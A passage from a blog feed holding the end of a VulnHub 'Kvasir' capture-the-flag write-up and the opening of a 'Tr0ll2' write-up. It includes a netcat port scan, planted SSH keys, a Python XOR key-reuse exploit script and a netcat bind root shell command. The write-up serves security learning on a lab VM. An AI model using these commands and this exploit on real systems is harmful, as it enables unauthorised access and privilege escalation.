</span><span class='line'>terra@dev2:~$ for i in {1..65535}; do nc -z 192.168.4.100 $i; if [ $? -eq 0 ]; then echo "Port $i listening" &gt;&gt; results; fi; done
</span><span class='line'>terra@dev2:~$ cat results 
</span><span class='line'>Port 22 listening
</span><span class='line'>Port 1111 listening</span></code></pre></td></tr></table></div></figure>


<p>Ha, awesome! Default sequence seemed to work, now we have another port opened. Let&rsquo;s connect to it.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ nc 192.168.4.100 1111
</span><span class='line'>whoami
</span><span class='line'>locke</span></code></pre></td></tr></table></div></figure>


<p>Shell!!!! Quickly generated new keys and dropped them under locke&rsquo;s <code>.ssh</code> dir. Let&rsquo;s connect via normal SSH.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>terra@dev2:~$ ssh locke@192.168.4.100 -i keys/locke.id
</span><span class='line'>Linux adm 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u3 x86_64
</span><span class='line'>
</span><span class='line'>The programs included with the Debian GNU/Linux system are free software;
</span><span class='line'>the exact distribution terms for each program are described in the
</span><span class='line'>individual files in /usr/share/doc/*/copyright.
</span><span class='line'>
</span><span class='line'>Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
</span><span class='line'>permitted by applicable law.
</span><span class='line'>Last login: Tue Nov  4 17:51:13 2014 from 192.168.4.50
</span><span class='line'>locke@adm:~$</span></code></pre></td></tr></table></div></figure>


<h2>A little bit of forensics</h2>

<p>After some poking around, we can see that this server is not dual-homed (finally!), so I think this could be our final machine!</p>

<p>Also, there&rsquo;s another user - <code>kefka</code>, I guess that&rsquo;s the one we&rsquo;ll need to get our privilege escalation from. But first, we need to get access to that account.</p>

<p>First thing that stands out is <code>note.txt</code> file and <code>diskimage.tar.gz</code>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>locke@adm:~$ cat note.txt 
</span><span class='line'>Looks like Kefka may have been abusing our removable media policy.  I've extracted this image to have a look.</span></code></pre></td></tr></table></div></figure>


<p>Cool, let&rsquo;s get diskimage file, extract it and see what it&rsquo;s all about (again, <code>scp</code> it all the way back to our Kali).</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# file diskimage 
</span><span class='line'>diskimage: x86 boot sector, code offset 0x3c, OEM-ID "MSDOS5.0", sectors/cluster 2, root entries 512, Media descriptor 0xf8, sectors/FAT 238, heads 255, hidden sectors 63, sectors 122031 (volumes &gt; 32 MB) , reserved 0x1, serial number 0xad6f8bf, unlabeled, FAT (16 bit)
</span><span class='line'>root@kali:~# mount diskimage /mnt
</span><span class='line'>root@kali:~# cd /mnt/
</span><span class='line'>root@kali:/mnt# ls
</span><span class='line'>total 21
</span><span class='line'>drwxr-xr-x  2 root root 16384 Jan  1  1970 .
</span><span class='line'>drwxr-xr-x 22 root root  4096 Oct 12 12:26 ..
</span><span class='line'>-rwxr-xr-x  1 root root   118 Aug  3 11:10 Secret.rar
</span><span class='line'>root@kali:/mnt# unrar x Secret.rar 
</span><span class='line'>
</span><span class='line'>UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>Extracting from Secret.rar
</span><span class='line'>
</span><span class='line'>Enter password (will not be echoed) for MyPassword.txt: 
</span><span class='line'>
</span><span class='line'>Extracting  MyPassword.txt                                            44%
</span><span class='line'>CRC failed in the encrypted file MyPassword.txt. Corrupt file or wrong password.
</span><span class='line'>Total errors: 1</span></code></pre></td></tr></table></div></figure>


<p>So I&rsquo;ve mounted the image, but can only see one file that is encrypted! And again, I don&rsquo;t have a password. Ahhh, did I miss something on the way? What made me suspicious though was the size of the diskimage file, it&rsquo;s like 60MB, while <code>Secret.rar</code> is merely a hundred bytes. There must be something else!</p>

<p>I reached out to a simple, extremely useful tool for extracting data from images - <code>foremost</code>. It&rsquo;ll extract all the files it can find (even deleted ones) from a provided image. Let&rsquo;s have a look what we can get here.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# foremost -i diskimage 
</span><span class='line'>Processing: diskimage
</span><span class='line'>|*|
</span><span class='line'>root@kali:~# cd output/
</span><span class='line'>root@kali:~/output# ls
</span><span class='line'>total 20
</span><span class='line'>drwxr-xr--  4 root root 4096 Nov  6 11:50 .
</span><span class='line'>drwxr-xr-x 27 root root 4096 Nov  6 11:50 ..
</span><span class='line'>-rw-r--r--  1 root root  729 Nov  6 11:50 audit.txt
</span><span class='line'>drwxr-xr--  2 root root 4096 Nov  6 11:50 rar
</span><span class='line'>drwxr-xr--  2 root root 4096 Nov  6 11:50 wav
</span><span class='line'>root@kali:~/output# cd wav/
</span><span class='line'>root@kali:~/output/wav# ls
</span><span class='line'>total 440
</span><span class='line'>drwxr-xr-- 2 root root   4096 Nov  6 11:50 .
</span><span class='line'>drwxr-xr-- 4 root root   4096 Nov  6 11:50 ..
</span><span class='line'>-rw-r--r-- 1 root root 440480 Nov  6 11:50 00000514.wav</span></code></pre></td></tr></table></div></figure>


<p>Cool, we found a wav file!</p>

<p>Unfortunately, it doesn&rsquo;t sound like anything useful at all&hellip; <code>strings</code> didn&rsquo;t return anything useful on it either. I did a bit of a research into hiding data in wav files, but there is variety of different tools and yet no hints about which one may have been used. But then got that idea&hellip; let&rsquo;s see &ldquo;how does the sound look like&rdquo;.</p>

<p>I&rsquo;ve downloaded <a href="http://www.sonicvisualiser.org/index.html">SonicVisualiser</a> and opened up spectogram of the wav file.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/spectogram.png" title="Spectogram" alt="Spectogram" /></p>

<p>Whoop, whoop! That&rsquo;s our password to the rar!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~/output/rar# unrar x 00000512.rar 
</span><span class='line'>
</span><span class='line'>UNRAR 4.10 freeware      Copyright (c) 1993-2012 Alexander Roshal
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>Extracting from 00000512.rar
</span><span class='line'>
</span><span class='line'>Enter password (will not be echoed) for MyPassword.txt: 
</span><span class='line'>
</span><span class='line'>Extracting  MyPassword.txt                                            OK 
</span><span class='line'>All OK
</span><span class='line'>root@kali:~/output/rar# cat MyPassword.txt 
</span><span class='line'>5224XbG5ki2C</span></code></pre></td></tr></table></div></figure>


<h2>Key reuse</h2>

<p>Using found password <code>5224XbG5ki2C</code> we can log-in as <code>kefka</code>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>locke@adm:~$ su - kefka
</span><span class='line'>Password: 
</span><span class='line'>kefka@adm:~$ sudo -l
</span><span class='line'>Matching Defaults entries for kefka on this host:
</span><span class='line'>    env_reset, mail_badpass,
</span><span class='line'>    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
</span><span class='line'>
</span><span class='line'>User kefka may run the following commands on this host:
</span><span class='line'>    (ALL) NOPASSWD: /opt/wep2.py</span></code></pre></td></tr></table></div></figure>


<p>And quickly see that we&rsquo;ll need to do our privilege escalation via <code>/opt/wep2.py</code> script.</p>

<p>So what does it actually do? It opens up local port 1234 and listens for connections. When you connect to it, it offers to provide you an encrypted flag and also encrypts input of your choice.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>kefka@adm:~$ sudo /opt/wep2.py &
</span><span class='line'>[1] 2817
</span><span class='line'>kefka@adm:~$ nc localhost 1234
</span><span class='line'>=============================
</span><span class='line'>Can you retrieve my secret..?
</span><span class='line'>=============================
</span><span class='line'>
</span><span class='line'>Usage:
</span><span class='line'>'V' to view the encrypted flag
</span><span class='line'>'E' to encrypt a plaintext string (e.g. 'E AAAA')
</span><span class='line'>
</span><span class='line'>V
</span><span class='line'>1e6115:09f6e8ef07010490172cdbb2
</span><span class='line'>V
</span><span class='line'>a54afe:9c82be3f9bdecf8e426c91d8
</span><span class='line'>V
</span><span class='line'>4c1261:57630397f8dbad94c02c0a45
</span><span class='line'>E A
</span><span class='line'>853283:cd
</span><span class='line'>E A
</span><span class='line'>acfd3c:93
</span></code></pre></td></tr></table></div></figure>


<p>Quickly we can observe couple things:</p>

<ul>
<li>encrypted text is always different</li>
<li>different keys are used each time (hence the above)</li>
<li>output strings are hex representations of encoded string</li>
<li>used key is pretty small</li>
</ul>


<p>Also, name of the script suggests WEP encryption&hellip; or at least that it&rsquo;s as bad as WEP :)</p>

<p>After a bit of research, we can craft our attack using key reuse. Few words on how it works.</p>

<p>Because of the way XOR works, some weak ciphers are vunerable to key reuse attack if the same key is reused. As long as you know the plaintext of one encrypted message and it&rsquo;s key, if you find another, unknown message encoded with the same key, you will be able to extract its plaintext. Let&rsquo;s look at the following:</p>

<p> <code>encrypted_messageA</code> = <code>messageA</code> XOR <code>key</code></p>

<p> <code>encrypted_messageB</code> = <code>messageB</code> XOR <code>key</code></p>

<p>What happens if we XOR both of them together? Remember that <code>abc XOR abc = 0</code>!</p>

<p> <code>encrypted_messageA XOR encrypted_messageB = messageA XOR key XOR messageB XOR key = messageA XOR messageB</code></p>

<p>Keys disappeared, because <code>key XOR key = 0</code>.</p>

<p>Now assume we know plaintext of <code>messageA</code> and want to find <code>messageB</code>. All we need to do is get rid of known <code>messageA</code> from the equation by XORing the whole thing with <code>messageA</code>.</p>

<p> <code>messageA XOR messageB XOR messageA = messageB</code></p>

<p>Again, because <code>messageA XOR messageA = 0</code>.</p>

<p><em>Some really good resources that helped me with understanding the concept:</em></p>

<ul>
<li><a href="http://b.cryptosmith.com/2008/05/31/stream-reuse/">http://b.cryptosmith.com/2008/05/31/stream-reuse/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Stream_cipher_attack">http://en.wikipedia.org/wiki/Stream_cipher_attack</a></li>
</ul>


<p>So, knowing what needs to be done, I&rsquo;ve crafted below script to quickly get our plaintext flag.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c">#!/usr/bin/python</span>
</span><span class='line'>
</span><span class='line'><span class="kn">import</span> <span class="nn">socket</span>
</span><span class='line'>
</span><span class='line'><span class="c"># XOR strings function definition (ensure to pass in binary values)</span>
</span><span class='line'><span class="c">#</span>
</span><span class='line'><span class="k">def</span> <span class="nf">xor_strings</span><span class="p">(</span><span class="n">p_string1</span><span class="p">,</span> <span class="n">p_string2</span><span class="p">):</span>
</span><span class='line'>    <span class="k">return</span> <span class="s">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">^</span> <span class="nb">ord</span><span class="p">(</span><span class="n">y</span><span class="p">))</span> <span class="k">for</span> <span class="n">x</span><span class="p">,</span> <span class="n">y</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">p_string1</span><span class="p">,</span> <span class="n">p_string2</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Initialise socket</span>
</span><span class='line'><span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span><span class='line'><span class="n">sock</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s">&quot;127.0.0.1&quot;</span><span class="p">,</span> <span class="mi">1234</span><span class="p">))</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Get banner and instructions</span>
</span><span class='line'><span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Random, known message of the same length as the flag</span>
</span><span class='line'><span class="c"># to be used later for XOR operations</span>
</span><span class='line'><span class="n">message</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="mi">12</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Collections of encrypted flags and messages</span>
</span><span class='line'><span class="n">flags</span> <span class="o">=</span> <span class="p">{}</span>
</span><span class='line'><span class="n">messages</span> <span class="o">=</span> <span class="p">{}</span>
</span><span class='line'>
</span><span class='line'><span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
</span><span class='line'>    <span class="c"># Build a list of known encrypted flags</span>
</span><span class='line'>    <span class="n">sock</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s">&quot;V</span><span class="se">\n</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>    <span class="n">encrypted_flag</span> <span class="o">=</span> <span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
</span><span class='line'>    <span class="n">flag_key</span> <span class="o">=</span> <span class="n">encrypted_flag</span><span class="p">[:</span><span class="mi">6</span><span class="p">]</span>
</span><span class='line'>    <span class="n">flag_value</span> <span class="o">=</span> <span class="n">encrypted_flag</span><span class="p">[</span><span class="mi">7</span><span class="p">:]</span>
</span><span class='line'>    <span class="n">flags</span><span class="p">[</span><span class="n">flag_key</span><span class="p">]</span> <span class="o">=</span> <span class="n">flag_value</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># Build a list of known encrypted messages</span>
</span><span class='line'>    <span class="n">sock</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s">&quot;E &quot;</span> <span class="o">+</span> <span class="n">message</span> <span class="o">+</span> <span class="s">&quot;</span><span class="se">\n</span><span class="s">&quot;</span><span class="p">)</span>
</span><span class='line'>    <span class="n">encrypted_message</span> <span class="o">=</span> <span class="n">sock</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
</span><span class='line'>    <span class="n">message_key</span> <span class="o">=</span> <span class="n">encrypted_message</span><span class="p">[:</span><span class="mi">6</span><span class="p">]</span>
</span><span class='line'>    <span class="n">message_value</span> <span class="o">=</span> <span class="n">encrypted_message</span><span class="p">[</span><span class="mi">7</span><span class="p">:]</span>
</span><span class='line'>    <span class="n">messages</span><span class="p">[</span><span class="n">message_key</span><span class="p">]</span> <span class="o">=</span> <span class="n">message_value</span>
</span><span class='line'>
</span><span class='line'>    <span class="c"># Find the flag key in message keys or vice versa</span>
</span><span class='line'>    <span class="c"># (since we&#39;re building 2 lists, check both - should</span>
</span><span class='line'>    <span class="c"># be able to find a match quicker)</span>
</span><span class='line'>    <span class="k">if</span> <span class="n">flag_key</span> <span class="ow">in</span> <span class="n">messages</span><span class="p">:</span>
</span><span class='line'>        <span class="n">message_value</span> <span class="o">=</span> <span class="n">messages</span><span class="p">[</span><span class="n">flag_key</span><span class="p">]</span>
</span><span class='line'>        <span class="k">break</span>
</span><span class='line'>
</span><span class='line'>    <span class="k">if</span> <span class="n">message_key</span> <span class="ow">in</span> <span class="n">flags</span><span class="p">:</span>
</span><span class='line'>        <span class="n">flag_value</span> <span class="o">=</span> <span class="n">flags</span><span class="p">[</span><span class="n">message_key</span><span class="p">]</span>
</span><span class='line'>        <span class="k">break</span>
</span><span class='line'>
</span><span class='line'><span class="c"># Values are returned in hex form, so need to convert it back</span>
</span><span class='line'><span class="c"># to binary for XOR</span>
</span><span class='line'><span class="n">binary_message</span> <span class="o">=</span> <span class="n">message_value</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&quot;hex&quot;</span><span class="p">)</span>
</span><span class='line'><span class="n">binary_flag</span> <span class="o">=</span> <span class="n">flag_value</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">&quot;hex&quot;</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># XOR both encryptions together</span>
</span><span class='line'><span class="c"># encrypted_message XOR encrypted_flag = message XOR key XOR flag XOR key</span>
</span><span class='line'><span class="n">xor_both_result</span> <span class="o">=</span> <span class="n">xor_strings</span><span class="p">(</span><span class="n">binary_message</span><span class="p">,</span> <span class="n">binary_flag</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="c"># XOR above rsult with plaintext message to get the flag, because:</span>
</span><span class='line'><span class="c"># key XOR key = 0; and</span>
</span><span class='line'><span class="c"># message XOR message = 0; therefore:</span>
</span><span class='line'><span class="c"># message XOR key XOR flag XOR key XOR message = flag</span>
</span><span class='line'><span class="n">decoded_flag</span> <span class="o">=</span> <span class="n">xor_strings</span><span class="p">(</span><span class="n">xor_both_result</span><span class="p">,</span> <span class="n">message</span><span class="p">)</span>
</span><span class='line'>
</span><span class='line'><span class="k">print</span> <span class="n">decoded_flag</span>
</span><span class='line'>
</span><span class='line'><span class="n">sock</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></code></pre></td></tr></table></div></figure>


<p>Let&rsquo;s exploit it!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>kefka@adm:~$ sudo /opt/wep2.py &
</span><span class='line'>[1] 2824
</span><span class='line'>kefka@adm:~$ ./exp.py 
</span><span class='line'>0W6U6vwG4W1V</span></code></pre></td></tr></table></div></figure>


<p>Wow, that was actually <em>really</em> quick (way less than 1s)&hellip; that&rsquo;s our plaintext flag! But is that it? We need a root shell! I tried using it as a root password, but didn&rsquo;t work. Tried few other things, tried to find other privilege escalation points, but no luck.</p>

<p>Finally, I decided to put it in as input in the program we just exploited.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>=============================
</span><span class='line'>Can you retrieve my secret..?
</span><span class='line'>=============================
</span><span class='line'>
</span><span class='line'>Usage:
</span><span class='line'>'V' to view the encrypted flag
</span><span class='line'>'E' to encrypt a plaintext string (e.g. 'E AAAA')
</span><span class='line'>
</span><span class='line'>0W6U6vwG4W1V
</span><span class='line'>&gt; ls
</span><span class='line'>Traceback (most recent call last):
</span><span class='line'>  File "&lt;string&gt;", line 1, in &lt;module&gt;
</span><span class='line'>NameError: name 'ls' is not defined
</span><span class='line'>&gt; print "A"
</span><span class='line'>A</span></code></pre></td></tr></table></div></figure>


<p>Python shell? Wow, ok, let&rsquo;s create real shell!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>&gt; import os; os.system("nc -e /bin/sh -l -p 31337")
</span><span class='line'>^C
</span><span class='line'>kefka@adm:~$ nc localhost 31337
</span><span class='line'>id
</span><span class='line'>uid=0(root) gid=0(root) groups=0(root)
</span><span class='line'>cd /root
</span><span class='line'>ls
</span><span class='line'>flag
</span><span class='line'>cat flag
</span><span class='line'>    _  __                             _            
</span><span class='line'>   | |/ /   __ __   __ _     ___     (_)      _ _  
</span><span class='line'>   | ' &lt;    \ I /  / _` |   (_-&lt;     | |     | '_| 
</span><span class='line'>   |_|\_\   _\_/_  \__,_|   /__/_   _|_|_   _|_|_  
</span><span class='line'>  _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
</span><span class='line'>  "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
</span><span class='line'>
</span><span class='line'>Pbatenghyngvbaf ba orngvat Xinfve - V ubcr lbh rawblrq
</span><span class='line'>gur evqr.  Gnxr uvf oybbq, zvk jvgu ubarl naq qevax 
</span><span class='line'>gur Zrnq bs Cbrgel...
</span><span class='line'>
</span><span class='line'>Ovt fubhg bhg gb zl orgn grfgref: @oneeronf naq @GurPbybavny.
</span><span class='line'>Fcrpvny gunaxf gb Onf sbe uvf cngvrapr qhevat guvf raqrnibhe.
</span><span class='line'>
</span><span class='line'>Srry serr gb cvat zr jvgu gubhtugf/pbzzragf ba
</span><span class='line'>uggc://jv-sh.pb.hx, #IhyaUho VEP be Gjvggre.
</span><span class='line'>
</span><span class='line'>  enfgn_zbhfr(@_EnfgnZbhfr)</span></code></pre></td></tr></table></div></figure>


<p>Even the flag is messed up&hellip; ROT-13 :)</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>cat flag | tr 'n-za-mN-ZA-M' 'a-zA-Z'
</span><span class='line'>    _  __                             _            
</span><span class='line'>   | |/ /   __ __   __ _     ___     (_)      _ _  
</span><span class='line'>   | ' &lt;    \ V /  / _` |   (_-&lt;     | |     | '_| 
</span><span class='line'>   |_|\_\   _\_/_  \__,_|   /__/_   _|_|_   _|_|_  
</span><span class='line'>  _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
</span><span class='line'>  "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
</span><span class='line'>
</span><span class='line'>Congratulations on beating Kvasir - I hope you enjoyed
</span><span class='line'>the ride.  Take his blood, mix with honey and drink 
</span><span class='line'>the Mead of Poetry...
</span><span class='line'>
</span><span class='line'>Big shout out to my beta testers: @barrebas and @TheColonial.
</span><span class='line'>Special thanks to Bas for his patience during this endeavour.
</span><span class='line'>
</span><span class='line'>Feel free to ping me with thoughts/comments on
</span><span class='line'>http://wi-fu.co.uk, #VulnHub IRC or Twitter.
</span><span class='line'>
</span><span class='line'>  rasta_mouse(@_RastaMouse)
</span></code></pre></td></tr></table></div></figure>


<h2>Summary</h2>

<p>Awesome challenge! Spent quite a lot of hours (on and off) working on it, I liked the multi-layered design of it and how it touched on quite a lot of aspects of security! Also I managed to brush up on some of the forensics skills and learnt something new about key reuse :) Great job building it up <a href="https://twitter.com/_RastaMouse">Rasta Mouse</a>!</p>

<p>Oh, also, obligatory network diagram of the whole thing.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/diagram.png" title="Diagram" alt="Diagram" /></p>
]]></content>
  </entry>
  
  <entry>
    <title type="html"><![CDATA[Beating the Troll - Tr0ll2 Writeup]]></title>
    <link href="http://blog.knapsy.com/blog/2014/10/28/beating-the-troll-tr0ll2-writeup/"/>
    <updated>2014-10-28T19:57:51+11:00</updated>
    <id>http://blog.knapsy.com/blog/2014/10/28/beating-the-troll-tr0ll2-writeup</id>
    <content type="html"><![CDATA[<p>Damn, I love <a href="http://www.vulnhub.com">VulnHub</a> - always keeps me entertained! With so many VMs released recently and with me just coming off an awesome CTF I have been kept quite busy those last couple weeks! Keeping the momentum up, I decided to give <a href="http://vulnhub.com/entry/tr0ll-2,107/">Tr0ll2 VM</a> a shot. As expected, there were trolls on the way, but overall I quite enjoyed it! Alright, let&rsquo;s rock on.</p>

<!-- more -->


